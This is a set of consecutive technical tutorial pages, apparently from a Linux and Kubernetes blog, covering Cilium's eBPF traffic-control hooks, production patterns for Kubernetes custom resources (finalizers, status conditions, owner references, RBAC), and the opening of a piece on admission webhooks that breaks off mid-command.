  wire → NIC → [XDP hook] → sk_buff allocated → [TC ingress hook] → netfilter → socket

Egress path:
  socket → IP routing → [TC egress hook] → qdisc → NIC → wire

At the TC egress hook on a pod’s veth interface, the sk_buff carries the socket that created the packet — and from that socket you can read the cgroup ID. The cgroup hierarchy maps container → pod, so the TC program knows which pod this traffic belongs to. That’s what makes pod-level enforcement possible.

The Linux Traffic Control Architecture

tc (traffic control) is the Linux subsystem for managing packet queues and scheduling. Most Linux administrators know it as the bandwidth-shaping tool:

# Classic tc usage — rate limit an interface
tc qdisc add dev eth0 root tbf rate 100mbit burst 32kbit latency 400ms

The qdisc (queuing discipline) is the primary abstraction. Under the qdisc sits a filter layer — and the filter type relevant to eBPF is cls_bpf, which attaches eBPF programs as packet classifiers.

qdisc (queuing discipline) is the kernel’s packet scheduler for an interface — it controls how packets are buffered and in what order they leave. For eBPF policy enforcement, Cilium uses a special qdisc called clsact which has no buffering behaviour at all; it purely provides the ingress and egress hook points where eBPF filters attach. If a pod veth doesn’t have clsact, Cilium isn’t enforcing policy on that pod.

Cilium attaches cls_bpf filters in direct action (DA) mode, which combines classifier and action into a single eBPF program. The program’s return value is the packet fate directly:

Return value Action
TC_ACT_OK (0) Pass the packet
TC_ACT_SHOT (2) Drop the packet
TC_ACT_REDIRECT (7) Redirect to another interface
TC_ACT_PIPE (3) Pass to the next filter in the chain

TC Context: What Your Program Can See

TC programs receive a struct __sk_buff — a safe, BPF-accessible projection of the kernel sk_buff. Unlike the raw packet bytes in XDP, __sk_buff includes metadata:

struct __sk_buff {
    __u32 len;           // packet length
    __u32 pkt_type;      // PACKET_HOST, PACKET_BROADCAST, etc.
    __u32 mark;          // skb->mark — used by Cilium for pod identity
    __u32 queue_mapping;
    __u32 protocol;      // ETH_P_IP, ETH_P_IPV6, etc.
    __u32 vlan_present;
    __u32 vlan_tci;
    __u32 vlan_proto;
    __u32 priority;
    __u32 ingress_ifindex;
    __u32 ifindex;
    __u32 tc_index;
    __u32 cb[5];
    __u32 hash;
    __u32 tc_classid;
    __u32 data;          // offset to packet data
    __u32 data_end;
    __u32 napi_id;
    __u32 family;
    __u32 remote_ip4;    // source IP (ingress) or dest IP (egress)
    __u32 local_ip4;
    __u32 remote_port;
    __u32 local_port;
    // ...
};

skb->mark is how Cilium passes pod identity between its hook points.

skb->mark is a 32-bit field in every sk_buff that any kernel subsystem can read or write. It’s a general-purpose scratch field — iptables uses it, routing rules use it, and Cilium uses it to carry pod security identity from the socket hook through to TC enforcement. When Cilium stamps a pod’s identity into skb->mark at connection time, every subsequent TC filter on that packet’s path can read it without another identity lookup. The socket-level cgroup hook (cgroup_sock_addr) stamps the cgroup-derived pod identity into skb->mark when the socket calls connect(). By the time the packet reaches the TC egress hook, skb->mark carries the pod’s security identity — and the TC program uses it for policy enforcement.

What Cilium’s TC Filters Actually Do

The TC filter on each pod’s veth is Cilium’s enforcement point for Kubernetes NetworkPolicy. The mechanism:

  1. When a pod opens a connection, a cgroup_sock_addr hook stamps the pod’s security identity (derived from its labels + namespace) into skb->mark
  2. The TC egress filter on the veth reads skb->mark, looks up the pod identity + destination in the policy map, and returns TC_ACT_SHOT (drop) or TC_ACT_OK (pass)
  3. The TC ingress filter on the receiving pod’s veth does the same check for inbound traffic

The policy map is a BPF LRU hash keyed on {pod_identity, dst_ip, dst_port, protocol}. This is what cilium policy get reads from — and what bpftool map dump shows directly:

# Find Cilium's policy maps
bpftool map list | grep -i policy

# Dump the active policy entries for a specific endpoint
# Get endpoint ID from: cilium endpoint list
cilium bpf policy get <endpoint-id>

# Cross-check with raw bpftool dump
bpftool map dump id <POLICY_MAP_ID> | head -30

The clsact qdisc is the prerequisite for any TC eBPF filter — it creates the ingress and egress hook points without any queuing behavior. Every pod veth on a Cilium node has one:

tc qdisc show dev lxcABCDEF
# qdisc clsact ffff: dev lxcABCDEF parent ffff:fff1
# ^^^^^^^^^^^^ this line confirms Cilium's hook points exist on this pod's veth
# If this is missing: Cilium is NOT enforcing NetworkPolicy on this pod

If a pod veth doesn’t show clsact, Cilium isn’t enforcing policy on that pod.

Multiple Programs and the Filter Chain

This is the detail that caused my production incident.

TC supports chaining multiple filters on the same hook, ordered by priority. Lower priority number runs first. When Cilium upgrades, it installs a new filter at a new priority before removing the old one. If the upgrade procedure has any timing gap — or if the removal step fails silently — you end up with two programs running in sequence.

# Show all TC filters on a pod's veth — both priorities visible
tc filter show dev lxc12345 egress

# Example output with a stale filter:
filter protocol all pref 1 bpf chain 0
filter protocol all pref 1 bpf chain 0 handle 0x1 cil_to_container direct-action not_in_hw id 44
filter protocol all pref 2 bpf chain 0
filter protocol all pref 2 bpf chain 0 handle 0x1 old_cil_to_container direct-action not_in_hw id 17

Two programs. Pref 1 runs first. Pref 2 runs second — unless pref 1 returned TC_ACT_SHOT, in which case the packet is already dropped and pref 2 never fires.

In my incident: pref 1 was the current Cilium version with correct policy, returning TC_ACT_OK for the traffic in question. Pref 2 was the old version with a stale block entry, returning TC_ACT_SHOT for a subset of connection tuples. Because TC_ACT_OK passes to the next filter in the chain (TC_ACT_PIPE would do the same), pref 2 got to run — and intermittently dropped packets.

The fix:

# Remove the stale filter by priority
tc filter del dev lxc12345 egress pref 2

# Verify only the current filter remains
tc filter show dev lxc12345 egress

This should be part of any post-upgrade verification for Cilium-managed clusters.

How Cilium Uses TC Across the Full Node

Cilium’s TC deployment on a node:

Pod veth (host-side, lxcXXXXX):
  TC ingress: cil_from_container — L3/L4 policy on the pod's outbound traffic
  TC egress:  cil_to_container   — L3/L4 policy on traffic arriving at the pod

Node uplink (eth0):
  TC ingress: cil_from_netdev    — traffic arriving from outside the node
  TC egress:  cil_to_netdev      — traffic leaving the node

XDP on eth0:
  cil_xdp_entry — pre-stack service load balancing (DNAT for ClusterIP)

The naming is counterintuitive at first: cil_from_container is attached to the TC ingress hook on the veth.

Veth direction confusion: TC ingress/egress is named from the kernel’s perspective of the interface, not the pod’s. The host-side veth interface receives traffic that the pod is sending — so TC ingress on the host veth = the pod’s outbound traffic. This trips up everyone the first time. When debugging, always confirm direction with tc filter show dev lxcXXX ingress and egress separately, and check which Cilium program name is attached (cil_from_container = pod outbound, cil_to_container = pod inbound). The veth ingress direction from the host perspective is traffic flowing out of the container. Traffic leaving the pod hits the host-side veth ingress, which is cil_from_container. It enforces egress policy for the pod. Naming follows the kernel’s perspective of the interface, not the application’s.

To see the full picture on a node:

# All eBPF network programs (XDP and TC) across all interfaces
bpftool net list

# TC-specific view
for iface in $(ip link | grep lxc | awk -F': ' '{print $2}'); do
    echo "=== $iface ==="
    tc filter show dev $iface ingress
    tc filter show dev $iface egress
done

TC Can Modify Packets Too

Unlike XDP, TC programs have full access to the sk_buff and can modify packet content — headers, payload, and checksums. This is how TC-based DNAT works in Cilium when XDP isn’t available on the NIC: the program rewrites the destination IP at L3 and updates the IP + transport checksums atomically. The kernel BPF helper handles the checksum recalculation.

From an operational standpoint: if you see a TC program attached but expected traffic is being redirected rather than dropped, the program is likely doing DNAT. bpftool prog dump xlated id <ID> shows the disassembled instructions and will reveal bpf_skb_store_bytes calls if packet rewriting is happening.

Debugging TC Programs in Production

Workflow I follow when investigating network issues on Cilium clusters:

# 1. List all eBPF network programs (see the full picture)
bpftool net list

# 2. Check specific interface for stale TC filters
tc filter show dev lxcABCDEF ingress
tc filter show dev lxcABCDEF egress

# 3. Inspect a specific program
bpftool prog show id 44

# 4. Disassemble a program (last resort for understanding behavior)
bpftool prog dump xlated id 44

# 5. Check Cilium's view of the same interface
cilium endpoint list
cilium endpoint get <endpoint-id>

# 6. Enable verbose TC program logs (debug builds only)
# Cilium: set CILIUM_DEBUG=true in the deployment

Common Mistakes

Mistake Impact Fix
Not checking for stale TC filters after Cilium upgrades Conflicting policy programs cause intermittent drops Run tc filter show post-upgrade; remove stale by priority
Confusing ingress/egress direction on veth interfaces Policy applied to wrong traffic direction TC ingress on host-side veth = pod’s outbound traffic
Attaching TC without clsact qdisc Filter attachment fails tc qdisc add dev <iface> clsact before filter add
Using TC_ACT_OK when you want to stop the chain Subsequent filters still run Use TC_ACT_OK knowing the chain continues; use TC_ACT_REDIRECT or explicit TC_ACT_SHOT only
Expecting TC performance equal to XDP TC has sk_buff overhead — it’s slower Right tool: XDP for pre-stack bulk drops, TC for identity-aware policy
Hardcoding skb->mark interpretation Different tools use mark differently Document mark field usage clearly; coordinate between Cilium and custom programs

Key Takeaways

  • TC eBPF fires after sk_buff allocation — it has socket metadata, cgroup ID, and pod identity that XDP lacks
  • Direct action (DA) mode combines filter and action; the program’s return value is the packet fate
  • Multiple TC programs chain on the same hook ordered by priority — stale programs from Cilium upgrades cause silent policy conflicts
  • tc filter show dev <iface> ingress/egress is the primary inspection tool; bpftool net list shows the full node picture
  • XDP + TC is the Cilium data path: XDP for pre-stack service load balancing, TC for per-pod identity-based enforcement
  • TC can modify packet content (bpf_skb_store_bytes) — the basis for TC-based DNAT and packet mangling

What’s Next

EP08 closes out the kernel machinery arc: program types, maps, CO-RE, XDP, TC. Five episodes on the engine under the tools. EP09 shifts from understanding the machinery to using it interactively.

bpftrace turns kernel knowledge into one-liners you can run on a live production node. Which process is touching this file right now? Where is this latency spike originating in the kernel call stack? Which container is making DNS queries to an unexpected resolver? Under 10 seconds per question — no restart, no sidecar, no instrumentation change.

Every bpftrace one-liner is a complete eBPF program compiled, loaded, run, and cleaned up on the fly. EP09 covers how that works and why it changes the way you investigate production incidents.

Next: bpftrace — kernel answers in one line

Get EP09 in your inbox when it publishes → linuxcent.com/subscribe

Kubernetes CRDs in Production: Finalizers, Status Conditions, and RBAC Patterns

Reading Time: 8 minutes

Kubernetes CRDs & Operators: Extending the API, Episode 10
What Is a CRD? · CRDs You Already Use · CRD Anatomy · Write Your First CRD · CEL Validation · Controller Loop · Build an Operator · CRD Versioning · Admission Webhooks · CRDs in Production


TL;DR

  • Finalizers block deletion until cleanup completes — they prevent orphaned external resources but cause stuck objects if the controller crashes mid-cleanup; always implement a removal timeout
  • Status conditions are the standard communication channel between controller and user: use type, status, reason, message, and observedGeneration on every condition; never invent ad-hoc status fields
  • Owner references wire automatic garbage collection — when the parent custom resource is deleted, Kubernetes deletes owned child objects; use them for every object your controller creates in the same namespace
  • RBAC for CRDs in multi-tenant clusters must include separate ClusterRoles for controller, editor, and viewer; grant status and finalizers as separate sub-resources; never give application teams cluster-scoped create/delete on CRDs
  • The three most common Kubernetes CRD production failure modes: finalizer death loop, status thrash, and CRD deletion cascade — all avoidable with the patterns in this episode
  • Running kubectl get crds on a healthy cluster should show Established: True for every CRD; non-Established CRDs silently reject all create requests

The Big Picture

  PRODUCTION CRD LIFECYCLE: FULL PICTURE

  Create         Reconcile        Suspend/Resume      Delete
  ──────         ─────────        ──────────────      ──────
  User applies   Controller       User patches         User deletes
  BackupPolicy   creates CronJob, spec.suspended=true  BackupPolicy
      │          sets status          │                    │
      ▼              │                ▼                    ▼
  Admission      │           Controller          Finalizer blocks
  webhook        │           suspends CronJob     deletion
  (if any)       │                               Controller:
      │          │                                 1. Delete CronJob
      ▼          ▼                                 2. Remove external state
  Schema       Status                              3. Remove finalizer
  validation   conditions                          Object deleted from etcd
      │        updated
      ▼
  Controller
  reconcile
  triggered

Kubernetes CRD production readiness is not just about making the happy path work — it is about designing for the failure modes: controllers crashing mid-operation, deletion races, and status messages that confuse operators at 2am.


Finalizers: Controlled Deletion

A finalizer is a string in metadata.finalizers. Kubernetes will not delete an object that has finalizers, regardless of who issues the delete command.

metadata:
  name: nightly
  namespace: demo
  finalizers:
    - storage.example.com/backup-cleanup  # ← your controller put this here

When kubectl delete bp nightly runs:

  1. API server sets metadata.deletionTimestamp  (does NOT delete yet)
  2. Object is visible as "Terminating"
  3. Controller sees deletionTimestamp set
  4. Controller runs cleanup:
       - delete backup data from S3
       - delete CronJob (or let owner references handle it)
       - release any external locks
  5. Controller removes the finalizer:
       patch bp nightly --type=json \
         -p '[{"op":"remove","path":"/metadata/finalizers/0"}]'
  6. API server sees finalizers list is now empty → deletes the object

Adding a finalizer in Go

const finalizerName = "storage.example.com/backup-cleanup"

func (r *BackupPolicyReconciler) Reconcile(ctx context.Context, req ctrl.Request) (ctrl.Result, error) {
    bp := &storagev1alpha1.BackupPolicy{}
    if err := r.Get(ctx, req.NamespacedName, bp); err != nil {
        return ctrl.Result{}, client.IgnoreNotFound(err)
    }

    // Deletion path
    if !bp.DeletionTimestamp.IsZero() {
        if controllerutil.ContainsFinalizer(bp, finalizerName) {
            if err := r.cleanupExternalResources(ctx, bp); err != nil {
                return ctrl.Result{}, err
            }
            controllerutil.RemoveFinalizer(bp, finalizerName)
            if err := r.Update(ctx, bp); err != nil {
                return ctrl.Result{}, err
            }
        }
        return ctrl.Result{}, nil
    }

    // Normal path: ensure finalizer is present
    if !controllerutil.ContainsFinalizer(bp, finalizerName) {
        controllerutil.AddFinalizer(bp, finalizerName)
        if err := r.Update(ctx, bp); err != nil {
            return ctrl.Result{}, err
        }
    }

    // ... rest of reconcile
}

Finalizer death loop and the timeout pattern

If cleanupExternalResources always returns an error (external system down, bug in cleanup code), the object gets stuck in Terminating forever. The operator cannot delete it; kubectl delete --force does not help with finalizers.

Prevention: add a cleanup deadline with status tracking.

func (r *BackupPolicyReconciler) cleanupExternalResources(ctx context.Context, bp *storagev1alpha1.BackupPolicy) error {
    // Check if we've been trying to clean up for too long
    if bp.DeletionTimestamp != nil {
        deadline := bp.DeletionTimestamp.Add(10 * time.Minute)
        if time.Now().After(deadline) {
            // Log the failure, abandon cleanup, let the object be deleted.
            log.FromContext(ctx).Error(nil, "cleanup deadline exceeded, removing finalizer anyway",
                "name", bp.Name)
            return nil   // returning nil removes the finalizer
        }
    }
    // ... actual cleanup
}

Recovery for a stuck object (use only when cleanup truly cannot succeed):

kubectl patch bp nightly -n demo --type=json \
  -p '[{"op":"remove","path":"/metadata/finalizers"}]'

Status Conditions: The Right Way

The Kubernetes standard condition format is defined in k8s.io/apimachinery/pkg/apis/meta/v1.Condition:

type Condition struct {
    Type               string          // e.g. "Ready", "Synced", "Degraded"
    Status             ConditionStatus // "True", "False", "Unknown"
    ObservedGeneration int64           // the .metadata.generation this condition reflects
    LastTransitionTime metav1.Time     // when Status last changed
    Reason             string          // machine-readable, CamelCase, e.g. "CronJobCreated"
    Message            string          // human-readable, may contain details
}

Standard condition types

Type Meaning
Ready The resource is fully reconciled and operational
Synced The resource has been synced with an external system
Progressing An operation is actively in progress
Degraded The resource is operating in a reduced capacity

Use Ready: True only when the full reconcile is complete and the resource is functional. Use Ready: False with a clear Message when reconcile fails or is blocked.

Setting conditions in Go

meta.SetStatusCondition(&bpCopy.Status.Conditions, metav1.Condition{
    Type:               "Ready",
    Status:             metav1.ConditionFalse,
    ObservedGeneration: bp.Generation,
    Reason:             "CronJobCreateFailed",
    Message:            fmt.Sprintf("failed to create CronJob: %v", err),
})

meta.SetStatusCondition handles deduplication — it updates an existing condition of the same Type rather than appending a duplicate.

observedGeneration is critical

metadata.generation      = 5   (increments on every spec change)
status.observedGeneration = 3  (set by controller on each reconcile)

If observedGeneration < generation:
  → controller has not yet reconciled the latest spec change
  → status.conditions reflect an older state
  → do NOT alert based on conditions that lag generation

Always set ObservedGeneration: bp.Generation when writing status conditions. Tooling (Argo CD, Flux, kubectl wait) depends on this to know whether status is current.

kubectl wait uses conditions

# Wait until BackupPolicy is Ready
kubectl wait bp/nightly -n demo \
  --for=condition=Ready \
  --timeout=60s

This works because kubectl wait reads the status.conditions array.


Owner References: Automatic Garbage Collection

Owner references wire a parent-child relationship between Kubernetes objects. When the parent is deleted, Kubernetes garbage-collects all owned children automatically.

metadata:
  name: nightly-backup       # CronJob
  ownerReferences:
    - apiVersion: storage.example.com/v1alpha1
      kind: BackupPolicy
      name: nightly
      uid: a1b2c3d4-...
      controller: true          # only one owner can be the controller
      blockOwnerDeletion: true  # the GC waits for this owner before deleting child

Set in Go using ctrl.SetControllerReference:

if err := ctrl.SetControllerReference(bp, cronJob, r.Scheme); err != nil {
    return ctrl.Result{}, err
}

Owner reference rules

  • Owner and owned object must be in the same namespace — cluster-scoped objects cannot own namespaced objects
  • Only one object can be the controller: true owner; others can be non-controller owners
  • Deleting the owner cascades to deleting owned objects — this is garbage collection, not finalizer-based cleanup

Without owner references, deleting a BackupPolicy leaves the CronJob as an orphan. This is hard to detect and accumulates over time.


RBAC Patterns for Multi-Tenant CRD Usage

A production CRD deployment needs three distinct RBAC roles:

# 1. Controller role — full access for the operator
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: backuppolicy-controller
rules:
  - apiGroups: ["storage.example.com"]
    resources: ["backuppolicies"]
    verbs: ["get", "list", "watch", "update", "patch"]
  - apiGroups: ["storage.example.com"]
    resources: ["backuppolicies/status"]
    verbs: ["get", "update", "patch"]
  - apiGroups: ["storage.example.com"]
    resources: ["backuppolicies/finalizers"]
    verbs: ["update"]
  - apiGroups: ["batch"]
    resources: ["cronjobs"]
    verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
---
# 2. Editor role — for application teams (namespaced binding)
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: backuppolicy-editor
rules:
  - apiGroups: ["storage.example.com"]
    resources: ["backuppolicies"]
    verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
  # No status write — only the controller writes status
  # No finalizers write — prevents deletion blocking by non-controllers
---
# 3. Viewer role — for audit, monitoring
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: backuppolicy-viewer
rules:
  - apiGroups: ["storage.example.com"]
    resources: ["backuppolicies"]
    verbs: ["get", "list", "watch"]

Bind editor/viewer roles at namespace scope, not cluster scope:

apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: team-alpha-backup-editor
  namespace: team-alpha
subjects:
  - kind: Group
    name: team-alpha
    apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: ClusterRole
  name: backuppolicy-editor
  apiGroup: rbac.authorization.k8s.io

This pattern gives team-alpha full control over BackupPolicies in their namespace but no access to other namespaces — standard Kubernetes multi-tenancy.


The Three Production Failure Modes

1. Finalizer death loop

Symptoms: Object stuck in Terminating for hours; kubectl get bp nightly shows DeletionTimestamp set but object exists.

Cause: cleanupExternalResources always returns an error.

Detection:

kubectl get bp nightly -n demo -o jsonpath='{.metadata.deletionTimestamp}'
# non-empty = stuck in termination
kubectl describe bp nightly -n demo
# look for repeated reconcile error events

Fix: Add cleanup deadline in controller; use kubectl patch to remove finalizer as last resort.

2. Status thrash

Symptoms: Controller sets Ready: True, then Ready: False, then Ready: True in a rapid loop. Alert noise, confusing dashboards.

Cause: Each reconcile compares actual state incorrectly due to cache lag — it sees its own status write as a change, re-reconciles, and flips the status again.

Fix: Set ObservedGeneration on every condition. Compare generation with observedGeneration before re-reconciling. Use meta.IsStatusConditionTrue to check current condition before overwriting it with the same value.

// Only update status if it changed
current := meta.FindStatusCondition(bp.Status.Conditions, "Ready")
if current == nil || current.Status != desired.Status || current.Reason != desired.Reason {
    meta.SetStatusCondition(&bpCopy.Status.Conditions, desired)
    r.Status().Update(ctx, bpCopy)
}

3. CRD deletion cascade

Symptoms: A team deletes a CRD for cleanup purposes; all instances across all namespaces disappear silently.

Cause: kubectl delete crd backuppolicies.storage.example.com — the API server cascades the deletion to all custom resources of that type.

Prevention:
– Add a resourcelock annotation on production CRDs managed by your operator
– Use GitOps (Argo CD, Flux) to manage CRD installation — a deleted CRD is automatically re-applied from the Git source
– Back up CRDs and instances with velero or equivalent before any CRD management operations


Production Readiness Checklist

CRD DEFINITION
  □ spec.versions has exactly one storage: true version
  □ Status subresource enabled (subresources.status: {})
  □ additionalPrinterColumns includes Ready column from status.conditions
  □ OpenAPI schema defines required fields and types
  □ CEL rules cover cross-field constraints

CONTROLLER
  □ Owner references set on all child resources
  □ Finalizer logic includes cleanup deadline
  □ Status conditions use standard format with observedGeneration
  □ Reconcile function is idempotent
  □ Not-found errors handled cleanly (return nil, not error)
  □ At least 2 replicas with leader election enabled

RBAC
  □ Three ClusterRoles: controller, editor, viewer
  □ Status and finalizers are separate RBAC sub-resources
  □ Editor/viewer bound at namespace scope, not cluster scope
  □ Controller ServiceAccount has only necessary permissions

OPERATIONS
  □ CRD installed via GitOps or Helm (not manual kubectl apply)
  □ Backup of CRDs and instances included in cluster backup
  □ kubectl get crds shows Established: True for all CRDs
  □ Monitoring for stuck Terminating objects (finalizer deadlock)
  □ Alert on controller reconcile error rate, not just pod health

⚠ Common Mistakes

Granting update on backuppolicies but not backuppolicies/status to the controller. If the controller cannot write status, status updates silently fail. The controller appears to run but status conditions never update. Grant both backuppolicies (for spec/metadata writes) and backuppolicies/status (for the status subresource path).

Setting Ready: True before all owned resources are healthy. If the controller sets Ready: True after creating the CronJob but before verifying the CronJob is actually active, users see a false-positive health signal. Only set Ready: True when you have confirmed the desired state is actually achieved.

Not setting observedGeneration on status conditions. Tools like Argo CD and kubectl wait --for=condition=Ready will report incorrect health status if observedGeneration is stale. Always set ObservedGeneration: obj.Generation in every condition write.

Using kubectl delete crd in a production cluster without a backup. This is irreversible. Treat CRDs as production-critical infrastructure — require GitOps review, backup verification, and team approval before any CRD deletion.


Quick Reference

# Check for stuck Terminating objects
kubectl get backuppolicies -A --field-selector metadata.deletionTimestamp!=''

# Force-remove a stuck finalizer (use only when cleanup is truly impossible)
kubectl patch bp nightly -n demo --type=json \
  -p '[{"op":"remove","path":"/metadata/finalizers/0"}]'

# Check all CRDs are Established
kubectl get crds -o jsonpath='{range .items[*]}{.metadata.name} {.status.conditions[?(@.type=="Established")].status}{"\n"}{end}'

# Watch status conditions update during reconcile
kubectl get bp nightly -n demo -w -o \
  jsonpath='{.status.conditions[?(@.type=="Ready")].status} {.status.conditions[?(@.type=="Ready")].message}{"\n"}'

# Verify owner references are set on child CronJob
kubectl get cronjob nightly-backup -n demo \
  -o jsonpath='{.metadata.ownerReferences}'

# List all objects owned by a BackupPolicy (by label)
kubectl get all -n demo -l backuppolicy=nightly

Key Takeaways

  • Finalizers block deletion until cleanup completes — always implement a cleanup deadline to prevent permanent stuck objects
  • Status conditions must use the standard format with observedGeneration — tooling depends on it for correctness
  • Owner references enable automatic garbage collection of child resources when the parent is deleted
  • RBAC needs three roles (controller, editor, viewer) with status and finalizers as separate sub-resources
  • The three production failure modes — finalizer death loop, status thrash, CRD deletion cascade — are all preventable with the patterns covered in this episode

Series Complete

You now have the full picture of Kubernetes CRDs and Operators: from understanding what a CRD is (EP01), through real examples (EP02), schema design (EP03), hands-on YAML (EP04), CEL validation (EP05), the controller loop (EP06), building an operator (EP07), versioning (EP08), admission webhooks (EP09), to production patterns in this episode.

The next series in the Kubernetes learning arc on linuxcent.com covers Kubernetes Networking Deep Dive — Services, Ingress, Gateway API, CNI, and eBPF networking. Subscribe below to get it when it launches.

Stay subscribed → linuxcent.com

Admission Webhooks: Validating and Mutating Requests Before They Reach etcd

Reading Time: 6 minutes

Kubernetes CRDs & Operators: Extending the API, Episode 9
What Is a CRD? · CRDs You Already Use · CRD Anatomy · Write Your First CRD · CEL Validation · Controller Loop · Build an Operator · CRD Versioning · Admission Webhooks · CRDs in Production


TL;DR

  • Kubernetes admission webhooks are HTTPS endpoints called by the API server synchronously on every create/update/delete — before the object reaches etcd
    (two types: mutating webhooks modify the object; validating webhooks approve or reject it — mutating runs first, then validating)
  • Use a validating webhook when you need to reject objects based on state you cannot express in CEL: checking if a referenced Secret exists, enforcing cross-resource quotas, consulting an external policy engine
  • Use a mutating webhook when you need to inject defaults or sidecar containers that depend on context you cannot express in the CRD schema (environment-specific defaults, sidecar injection)
  • Admission webhooks are an availability dependency — if your webhook is unreachable, the API requests it covers will fail. failurePolicy: Ignore is the safety valve; use it only for non-critical webhooks
  • OPA/Gatekeeper and Kyverno are admission webhook platforms — they let you write policy as code (Rego, YAML) instead of writing Go webhook handlers
  • For CRD-specific validation that only depends on the object itself, prefer CEL (EP05) — webhooks are for rules that require external lookups or cross-resource checks

The Big Picture

  KUBERNETES ADMISSION CHAIN (full picture)

  kubectl apply -f backuppolicy.yaml
        │
        ▼
  API Server: authentication + authorization
        │
        ▼
  1. Mutating admission webhooks
     ┌───────────────────────────────────────┐
     │ Receive object, return modified object │
     │ Examples: inject annotations,          │
     │ set defaults, add sidecars            │
     └───────────────────────────────────────┘
        │
        ▼
  2. Schema validation (OpenAPI + CEL)
        │
        ▼
  3. Validating admission webhooks
     ┌───────────────────────────────────────┐
     │ Receive object, return allow/deny     │
     │ Examples: quota checks, cross-        │
     │ resource validation, policy engines   │
     └───────────────────────────────────────┘
        │
        ▼ (allowed)
  etcd storage

Kubernetes admission webhooks are how tools like Istio inject sidecars, Kyverno enforces policies, and OPA/Gatekeeper applies organizational guardrails — all without modifying Kubernetes source code. Understanding them completes the picture of how Kubernetes is extended beyond CRDs.


Validating vs Mutating: When to Use Each

  DECISION TREE: CEL vs Validating Webhook vs Mutating Webhook

  "I need to validate a field value"
      │
      ├── Depends only on the object being submitted?
      │   → Use CEL (x-kubernetes-validations) — EP05
      │
      └── Needs to look up another resource, quota, or external system?
          → Use Validating Admission Webhook

  "I need to set default values or inject content"
      │
      ├── Defaults depend only on other fields in the same object?
      │   → Use OpenAPI schema defaults or CEL
      │
      └── Defaults depend on environment, namespace labels, or external config?
          → Use Mutating Admission Webhook

Practical examples:

Rule Right tool
retentionDays must be ≤ 365 CEL
if storageClass=premium then retentionDays ≤ 90 CEL
Referenced SecretStore must exist in the same namespace Validating webhook
BackupPolicy count per namespace must not exceed team quota Validating webhook
Inject costCenter annotation from namespace labels Mutating webhook
Inject backup-agent sidecar into all Pods in labeled namespaces Mutating webhook
Enforce that all BackupPolicies have a team label Kyverno or OPA policy

The Webhook Request/Response Contract

Both webhook types receive an AdmissionReview object and return an AdmissionReview response.

Request (from API server to webhook):

{
  "apiVersion": "admission.k8s.io/v1",
  "kind": "AdmissionReview",
  "request": {
    "uid": "705ab4f5-6393-11e8-b7cc-42010a800002",
    "kind": {"group": "storage.example.com", "version": "v1alpha1", "kind": "BackupPolicy"},
    "resource": {"group": "storage.example.com", "version": "v1alpha1", "resource": "backuppolicies"},
    "operation": "CREATE",
    "userInfo": {"username": "alice", "groups": ["system:authenticated"]},
    "object": { /* full BackupPolicy JSON */ },
    "oldObject": null
  }
}

Response for a validating webhook (allow):

{
  "apiVersion": "admission.k8s.io/v1",
  "kind": "AdmissionReview",
  "response": {
    "uid": "705ab4f5-6393-11e8-b7cc-42010a800002",
    "allowed": true
  }
}

Response for a validating webhook (deny):

{
  "response": {
    "uid": "...",
    "allowed": false,
    "status": {
      "code": 422,
      "message": "referenced SecretStore 'aws-secrets-manager' not found in namespace 'production'"
    }
  }
}

Response for a mutating webhook (allow + patch):

{
  "response": {
    "uid": "...",
    "allowed": true,
    "patchType": "JSONPatch",
    "patch": "W3sib3AiOiJhZGQiLCJwYXRoIjoiL21ldGFkYXRhL2Fubm90YXRpb25zL2Nvc3RDZW50ZXIiLCJ2YWx1ZSI6ImVuZ2luZWVyaW5nIn1d"
    // base64-encoded JSON patch:
    // [{"op":"add","path":"/metadata/annotations/costCenter","value":"engineering"}]
  }
}

Writing a Validating Webhook with kubebuilder

kubebuilder create webhook \
  --group storage \
  --version v1alpha1 \
  --kind BackupPolicy \
  --programmatic-validation

Edit api/v1alpha1/backuppolicy_webhook.go:

package v1alpha1

import (
    "context"
    "fmt"

    apierrors "k8s.io/apimachinery/pkg/api/errors"
    "k8s.io/apimachinery/pkg/runtime"
    "k8s.io/apimachinery/pkg/types"
    ctrl "sigs.k8s.io/controller-runtime"
    "sigs.k8s.io/controller-runtime/pkg/client"
    "sigs.k8s.io/controller-runtime/pkg/webhook/admission"
    esov1beta1 "github.com/external-secrets/external-secrets/apis/externalsecrets/v1beta1"
)

type BackupPolicyCustomValidator struct {
    Client client.Client
}

//+kubebuilder:webhook:path=/validate-storage-example-com-v1alpha1-backuppolicy,mutating=false,failurePolicy=fail,sideEffects=None,groups=storage.example.com,resources=backuppolicies,verbs=create;update,versions=v1alpha1,name=vbackuppolicy.kb.io,admissionReviewVersions=v1

func (v *BackupPolicyCustomValidator) SetupWebhookWithManager(mgr ctrl.Manager) error {
    v.Client = mgr.GetClient()
    return ctrl.NewWebhookManagedBy(mgr).
        For(&BackupPolicy{}).
        WithValidator(v).
        Complete()
}

// ValidateCreate validates a new BackupPolicy.
func (v *BackupPolicyCustomValidator) ValidateCreate(ctx context.Context, obj runtime.Object) (admission.Warnings, error) {
    bp := obj.(*BackupPolicy)
    return nil, v.validateSecretStoreRef(ctx, bp)
}

// ValidateUpdate validates an updated BackupPolicy.
func (v *BackupPolicyCustomValidator) ValidateUpdate(ctx context.Context, oldObj, newObj runtime.Object) (admission.Warnings, error) {
    bp := newObj.(*BackupPolicy)
    return nil, v.validateSecretStoreRef(ctx, bp)
}

// ValidateDelete is a no-op here.
func (v *BackupPolicyCustomValidator) ValidateDelete(ctx context.Context, obj runtime.Object) (admission.Warnings, error) {
    return nil, nil
}

// validateSecretStoreRef checks that the referenced SecretStore exists in the same namespace.
func (v *BackupPolicyCustomValidator) validateSecretStoreRef(ctx context.Context, bp *BackupPolicy) error {
    ref := bp.Spec.SecretStoreRef
    if ref == "" {
        return nil  // optional field; CEL handles it if required
    }

    store := &esov1beta1.SecretStore{}
    err := v.Client.Get(ctx, types.NamespacedName{Name: ref, Namespace: bp.Namespace}, store)
    if apierrors.IsNotFound(err) {
        return fmt.Errorf("referenced SecretStore %q not found in namespace %q",
            ref, bp.Namespace)
    }
    return err  // nil on found, real error on API failure
}

Writing a Mutating Webhook: Cost Center Injection

kubebuilder create webhook \
  --group storage \
